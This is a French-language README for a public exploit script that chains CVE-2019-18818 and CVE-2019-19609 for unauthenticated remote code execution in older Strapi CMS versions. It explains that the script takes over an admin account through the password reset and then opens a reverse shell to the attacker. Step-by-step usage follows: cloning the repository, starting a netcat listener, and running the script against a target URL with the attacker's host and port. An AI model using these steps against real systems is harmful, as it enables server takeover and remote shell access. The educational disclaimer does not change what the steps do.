
Script d'exploitation présentant une combinaison de CVE-2019-18818 et CVE-2019-19609 pour l'exécution de code à distance non authentifiée dans Strapi CMS.
Script d'exploitation présentant une combinaison de CVE-2019-18818 et CVE-2019-19609 pour une exécution de code à distance non authentifiée dans Strapi CMS.
Ce script exploite une vulnérabilité dans Strapi CMS versions 3.0.0-beta.17.4 et antérieures, permettant une exécution de code à distance non authentifiée.
L'exploitation fonctionne d'abord en tirant parti d'une vulnérabilité de réinitialisation de mot de passe pour obtenir un JSON Web Token (JWT) pour un utilisateur administratif. Ce jeton est ensuite utilisé pour envoyer une charge utile malveillante au Strapi CMS, ce qui déclenche un shell inverse vers la machine de l'attaquant.
Cloner le dépôt :
git clone https://github.com/Hackhoven/Strapi-RCE.git
Se rendre dans le répertoire
cd Strapi-RCE/
Mettre en place un listener Netcat
nc -nlvp <LPORT>
Exécuter le script avec l'URL cible, l'adresse IP de l'hôte local et le port de l'hôte local comme arguments
python3 strapi-rce.py <TARGET_URL> <LHOST> <LPORT>
Ce script est destiné uniquement à des fins éducatives. L'auteur n'approuve ni ne soutient l'utilisation de ce script pour des activités illégales ou contraires à l'éthique. Ce script doit être utilisé uniquement dans le cadre de recherches en sécurité légales ou d'environnements CTF. Utilisation à vos propres risques.
Réalisé par Hackhoven